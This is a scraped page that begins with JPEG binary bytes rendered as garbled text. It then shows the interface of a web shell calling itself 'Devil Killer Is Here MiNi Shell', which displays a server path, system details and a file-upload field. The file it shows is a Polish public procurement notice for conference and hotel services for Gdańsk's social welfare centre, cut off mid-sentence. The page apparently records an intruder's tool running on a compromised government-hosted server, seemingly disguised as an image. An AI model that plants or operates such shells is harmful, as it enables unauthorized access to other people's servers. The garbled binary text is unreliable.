JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250922/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20250922/0043563401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zapewnienie usług konferencyjnych, gastronomicznych i hotelowych na potrzeby szkolenia Kadry Zarządzającej i Kierowniczej oraz pracowników Miejskiego Ośrodka Pomocy Rodzinie w Gdańsku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejski Ośrodek Pomocy Rodzinie w Gdańsku</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 002837021</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Konrada Leczkowa 1A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdańsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">80-432</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">583423150</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mopr@gdansk.gda.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mopr.gda.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ochrona socjalna</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zapewnienie usług konferencyjnych, gastronomicznych i hotelowych na potrzeby szkolenia Kadry Zarządzającej i Kierowniczej oraz pracowników Miejskiego Ośrodka Pomocy Rodzinie w Gdańsku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3ed1b65d-39e1-4a1b-8288-4aaaf4282a20</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00435634</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00037127/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.11 Zapewnienie usług konferencyjnych, gastronomicznych i hotelowych na potrzeby szkolenia Kadry Zarządzającej i Kierowniczej oraz pracowników Miejskiego Ośrodka Pomocy Rodzinie w Gdańsku</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-3ed1b65d-39e1-4a1b-8288-4aaaf4282a20 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>zamawiającym a Wykonawcami, odbywa się drogą elektroniczną przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem http://ezamowienia.gov.pl oraz poczty elektronicznej. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu &#34;Wykonawca&#34; na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-<br/>Zamówienia, dostępny na stronie internetowej: http://ezamowienia.gov.pl/regulamin oraz informacje zamieszczone w zakładce<br/>&#34;centrum Pomocy&#34;</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Postępowanie o udzielenie zamówienia, prowadzone jest w języku polskim. W postępowaniu o udzielenie zamówienia publicznego, komunikacja między<br/>Zamawiającym a Wykonawcą, odbywa się drogą elektroniczną przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem: http://ezamowienia.gov.pl oraz poczty elektronicznej. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu &#34;Wykonawca&#34; na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej; http://ezamowienia.gov.pl/regulamin oraz informacje zamieszczone w zakładce &#34;Centrum Pomocy&#34;. Wykonawca przystępując do postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z Platformy e-Zamówienia oraz zobowiązuje się korzystając z platformy e-Zamówienia do przestrzegania jego postanowień. Maksymalny rozmiar plików przesyłanych za pośrednictwem &#34;Formularzy do komunikacji&#34; wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załącznik do jednego formularza). Za datę przekazania oferty, oświadczenia o którym mowa w art. 125 ust. 1 Pzp. podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych informacji, oświadczeń lub dokumentów przekazywanych w postępowaniu, przyjmuje się datę ich przekazania na Platformę e-Zamówienia. Możliwość korzystania w postępowaniu z &#34;Formularzy do komunikacji&#34; w pełnym zakresie, wymaga posiadania konta &#34;Wykonawcy&#34; na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z &#34;Formularzy do komunikacji&#34; służących do zadawania pytań dotyczących treści SWZ oraz załączników do zamówienia, wystarczające jest posiadanie tzw. &#34;konta uproszczonego&#34; na Platformie e-Zamówienia. Wszystkie wysłane i odebrane w postępowaniu przez Wykonawcę wiadomości, widoczne są po zalogowaniu w podglądzie postępowania w zakładce &#34;Komunikacja&#34;. Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń, składane są przez Wykonawcę za pośrednictwem Formularza do komunikacji jako załączniki. Sposób sporządzania dokumentów elektronicznych oświadczeń, musi być zgodny z wymaganiami określonymi w<br/>Rozporządzeniu Prezesa Rady Ministrów z dnia 30.12.2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postepowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U z 2020r. poz. 2452). UWAGA: pliki przesłane Zamawiającemu, powinny odpowiadać formatom określonym w Rozporządzeniu Rady Ministrów z dnia 12 kwietnia 2012r. w sprawie krajowych ram interoperacyjności,<br/>minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych: Dz. U. z 2017r. z późn. zm. Zamawiający zaleca używanie formatów plików: .PDF, .DOC, .COCX, .RTFF, .JPG, (.JPEG) do kompresji plików Zamawiający zaleca używanie formatów: .ZIP lub .7Z. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem sprawy SAMROP.II.260.2.2025. Zamawiający jest zobowiązany udzielić wyjaśnień niezwłocznie, jednak nie później niż na 2 dni przed upływem terminu składania ofert pod warunkiem, że wniosek z wyjaśnieniami treści SWZ, wpłynął do Zamawiającego nie później niż na 4 dni przed upływem terminu<br/>składania ofert. W przypadku gdy wniosek o wyjaśnienie treści SWZ wpłynie po upływie terminu o którym mowa powyżej, Zamawiający nie ma obowiązku udzielania wyjaśnień SWZ oraz obowiązku przedłużania terminu składania ofert.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający realizuje obowiązek dot. RODO w dokumentach zamówienia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SAMROP.II.260.3.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zapewnienie usług konferencyjnych, gastronomicznych i hotelowych na potrzeby szkolenia Kadry Zarządzającej i Kierowniczej oraz pracowników Miejskiego Ośrodka Pomocy Rodzinie w Gdańsku w związku z realizowaniem przez nich zadań z zakresu pomocy społecznej i wspierania mieszkańców i mieszkanek Gdańska, a także dotyczących przeciwdziałania przemocy domowej. Obiekt hotelowy powinien mieć standard kategorii co najmniej trzygwiazdkowej, w rozumieniu Rozporządzenia Ministra Gospodarki i Pracy z dnia 19 sierpnia 2004 r. w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie (tj. Dz. U. z 2017 r., poz. 2166) i być wpisanym do Centralnego Wykazu Obiektów Hotelarskich. Obiekt hotelowy powinien być oddalony nie więcej niż 100 km i nie mniej niż 50 km od siedziby głównej Miejskiego Ośrodka Pomocy Rodzinie w Gdańsku, tj. ul. Konrada Leczkowa 1A. Wykonawca zapewni bezpłatny parking dla maksimum 30 samochodów. Taksa klimatyczna powinna być ujęta w ofercie. Doba hotelowa rozpoczyna się w dniu najpóźniej o godzinie 14:00, w razie przyjazdów przed godziną zarezerwowanych pokoi uzależnione będzie od dostępności wolnych pokoi. Doba hotelowa kończy się w dniu wyjazdu najwcześniej o godzinie 11:00, a przedłużenie pobytu będzie możliwe, pod warunkiem dostępności wolnych pokoi. Wykonawca wymaga, aby Zamawiający w dniach <br/>13 - 14 listopada 2025r. (jedna doba hotelowa) zapewnił nocleg dla 43 osób w pokojach jednoosobowych. W zakresie zapewnienia usług konferencyjnych:<br/>Wykonawca zapewni dostęp do jednej sali konferencyjnych zdolnej pomieścić do 50 osób, w pierwszym dniu między godziną 10:00 a 17:00, a w drugim dniu między godzina 10:00 a 13:00. Sala konferencyjna musi być wyposażona w co najmniej wentylację mechaniczną. Sala konferencyjna powinna posiadać sieć Wi-Fi, stanowisko z rzutnikiem multimedialnym, ekranem przeznaczonym do rzutnika multimedialnego. Sala powinna mieć nagłośnienie i być wyposażona w dwa mikrofony i flipchart, a także posiadać możliwość zaciemnienia. Ponadto Wykonawca powinien zapewnić osobę do obsługi technicznej oraz akustycznej dostępną w trakcie szkoleń oraz przynajmniej na jedną godzinę przed rozpoczęciem szkoleń. Wykonawca zapewni osobom przebywającym na salach konferencyjnych bezpieczeństwo w zakresie w jakim wymagają tego przepisy BHP. Sala konferencyjne powinny być dostępne na wyłączność dla celów szkolenia. W zakresie zapewnienia usług gastronomicznych:<br/>Zapewnienie wyżywienia dla wszystkich zgłoszonych uczestników oraz wykładowców (niekorzystających z zakwaterowania). Wykonawca zapewni na potrzeby wyżywienia uczestników szkolenia odpowiednią ilość stołów i krzeseł oraz odpowiednie przygotowanie Sali i stołów cateringowych, obsługę kelnerską, a także usługę sprzątania. Wyżywienie dla 45 osób pierwszego dnia i dla 43 osób drugiego dnia (możliwość otrzymania posiłku wegetariańskiego, bez glutenu, bez laktozy). Wykonawca dołączy propozycje menu. W zakresie wyżywienia uczestników szkolenia Wykonawca zapewni: Dzień pierwszy:<br/>a) przerwa kawowa ciągła - kawa z ekspresu ciśnieniowego samoobsługowego, herbata minimum 3 rodzaje, soki owocowe minimum 2 rodzaje, woda niegazowana z cytryną podawana w dzbankach, woda gazowana butelkowana, dodatki - cukier, mleko do kawy, cytryna, ciasta domowe minimum 4 rodzaje, owoce filetowane minimum 3 rodzaje.<br/>b) lunch w formie bufetu: Zupa - minimum 250 ml na osobę w minimum dwóch wersjach: wegetariańskiej i mięsnej; Bufet gorący – minimum 2 x danie mięsne co najmniej 200 gram na osobę; 1 x danie rybne co najmniej 200 gram na osobę oraz 2 x danie wegetariańskie co najmniej 200 gram na osobę; <br/>co najmniej dwa dodatki do dań głównych w postaci ziemniaków, frytek, klusek śląskich itp. w ilości co najmniej 250gram na osobę, zestaw surówek i jarzyn w ilości co najmniej 150 gram dla każdego uczestnika. c) kolacja uroczysta w formie bufetu w raz z oprawa muzyczna (od godziny 19:00 do godziny 1:00): W jednej sali dla wszystkich uczestników szkolenia w formie bufetu, na którą będą się składać: Przystawki – minimum 2 x mięsna, 2 x wegetariańska i 1 x rybna oraz dodatki takie jak pieczywo minimum 2 rodzaje i bufet sałatkowy minimum 3 rodzaje; Bufet gorący – minimum 2 x danie mięsne, 1 x danie rybne oraz 2 x danie wegetariańskie, warzywa oraz dodatki takie jak ryż, ziemniaki itp.; Napoje - kawa z ekspresu ciśnieniowego samoobsługowego, herbata minimum 3 rodzaje, soki owocowe minimum 2 rodzaje, woda niegazowana z cytry ną podana w dzbankach, woda gazowana butelkowana. Dzień drugi: a) śniadanie w formie bufetu, zawierające również propozycje wegetariańskie; b) przerwa kawowa ciągła- kawa z ekspresu ciśnieniowego samoobsługowego, herbata minimum 3 rodzaje, soki owocowe minimum 2 rodzaje, woda niegazowana z cytryną podawana w dzbankach, woda gazowana butelkowana, dodatki - cukier, mleko do kawy, cytryna, ciasta domowe minimum 4 rodzaje, owoce filetowane minimum 3 rodzaje. c) lunch w formie bufetu: Zupa - minimum 250 ml na osobę w minimum dwóch wersjach: wegetariańskiej i mięsnej; Bufet gorący – minimum 2 x danie mięsne co najmniej 200 gram na osobę; 1 x danie rybne <br/>co najmniej 200 gram na osobę oraz 2 x danie wegetariańskie co najmniej 200 gram na osobę; co najmniej dwa dodatki do dań głównych w postaci ziemniaków, frytek, klusek śląskich itp. w ilości co najmniej 250 gram na osobę; zestaw surówek i jarzyn w ilości co najmniej 150gram dla każdego uczestnika. Przy realizacji usługi Wykonawca zapewni:<br/>1)	Zachowanie zasad higieny i obowiązujących przepisów sanitarnych przy przygotowaniu posiłków i ich podawaniu.<br/>2)	Przygotowanie posiłków zgodnie z zasadami racjonalnego wyżywienia, urozmaiconych <br/>z pełnowartościowych, świeżych produktów z ważnymi terminami przydatności do spożycia.<br/>3)	Skierowania do realizacji usług objętych przedmiotem umowy osób, które posiadają należyte przygotowanie do wykonywania tego typu czynności, posiadające stosowną wiedzę, kwalifikacje, doświadczenie oraz wymagane przepisami prawa badania.<br/>4)	Zagospodarowanie na własny koszt odpadów, w sposób zgodny z warunkami określonymi<br/>w ustawie z dnia 14 grudnia 2012 r. o odpadach (tj. Dz. U. z 2022r., poz. 699).<br/>Zachowanie zasad higieny i obowiązujących przepisów sanitarnych przy przygotowaniu posiłków<br/>i ich podawaniu.<br/>5)	Przestrzegania w trakcie realizacji usług wchodzących w zakres przedmiotu umowy obowiązujących przepisów sanitarnych, w tym ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia. (tj. Dz.U. z 2020., poz. 2021 ze zm.).<br/><br/>Ponadto: <br/>1)	Wykonawca zobowiązany jest do ścisłej współpracy z Zamawiającym na każdym etapie realizacji przedsięwzięcia, Zamawiający i Wykonawca w umowie wskażą osoby do kontaktu, w tym zakresie.<br/>2)	Wykonawca jest zobowiązany do zachowania najwyższej staranności i działania zgodnie z obowiązującym stanem prawnym.<br/>3)	Wykonawca odpowiada za wszelkie zobowiązania formalno-prawne wobec podmiotów z nim współpracujących przy lub na rzecz realizacji niniejszego zamówienia.<br/>4)	Wykonawca jest zobowiązany do niezwłocznego pisemnego informowania Zamawiającego o zaistnieniu sytuacji zagrażających niedotrzymaniu terminu lub sposobu realizacji przedmiotu zamówienia.<br/>5)	Ostateczna liczba uczestników zostanie podana najpóźniej na 7 dni roboczych przed rozpoczęciem zakwaterowania.<br/>6)	Wynagrodzenie Wykonawcy z tytułu realizacji zamówienia zależeć będzie od faktycznej ilości osób korzystających ze świadczonej usługi.<br/>7)	W przypadku anulowania lub zmniejszenia przez Zamawiającego zamówionych w niniejszej umowie usług w terminie do 7 dni przed planowanym przyjazdem, Zamawiający może dokonać bezkosztowej anulacji maksymalnie do 10% zamówionych usług. W takim wypadku proporcjonalnie pomniejszone zostanie wynagrodzenie Wykonawcy o którym mowa w § 6 pkt. 1, Umowy stanowiącej załącznik nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55120000-7 - Usługi hotelarskie w zakresie spotkań i konferencji</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55110000-4 - Hotelarskie usługi noclegowe</p> <p class="mb-0">55100000-1 - Usługi hotelarskie</p> <p class="mb-0">55300000-3 - Usługi restauracyjne i dotyczące podawania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-14</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	Za najkorzystniejszą ofertę zostanie uznana oferta spełniająca wymagania SWZ oraz ustawy Pzp, która uzyska największą łączną liczbę punktów K = KC + KG + KB<br/>2)	Kryteria oceny ofert obejmują:<br/>a) cena (KC) - 60%, co odpowiada 60 pkt.,<br/>b) elastyczne godziny doby hotelowej dla uczestników szkolenia (KG) – 20%, co odpowiada 20 pkt.<br/>c) budynek (KB) - 20%, co odpowiada 20 pkt.<br/>Zasady przyznawania punktów w poszczególnych kryteriach zostały opisane w ust. 3 - 5 niniejszego rozdziału SWZ. <br/>3)	Kryterium „cena” (KC) będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę na Formularzu Oferty wg poniższych zasad:<br/>KC = (CN/CB) × 60<br/>gdzie:<br/>KC - ilość punktów w kryterium cena,<br/>CB - cena oferty badanej,<br/>CN - najniższa cena spośród nieodrzuconych ofert,<br/>60 - waga kryterium.<br/>Maksymalnie oferta Wykonawcy może uzyskać 100 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Elastyczne godziny doby hotelowej dla uczestników szkolenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Budynek</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zapewnienie usług konferencyjnych, gastronomicznych i hotelowych na potrzeby szkolenia Pracowników Ośrodka Interwencji Kryzysowej Miejskiego Ośrodka Pomocy Rodzinie w Gdańsku. Zamawiający wymaga, aby zostały spełnione następujące wymogi: W zakresie zapewnienia usług hotelowych:<br/>Obiekt hotelowy powinien mieć standard kategorii co najmniej dwugwiazdkowej, w rozumieniu Rozporządzenia Ministra Gospodarki i Pracy z dnia 19 sierpnia 2004 r. w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie (tj. Dz. U. z 2017 r., poz. 2166) i być wpisanym do Centralnego Wykazu Obiektów Hotelarskich. o Centralnego Wykazu Obiektów Hotelarskich. Obiekt hotelowy powinien być oddalony nie więcej niż 90 km i nie mniej niż 40 km od głównej siedziby Miejskiego Ośrodka Pomocy Rodzinie w Gdańsku. Wykonawca zapewni bezpłatny parking dla maksimum 20 samochodów. Taksa klimatyczna powinna być 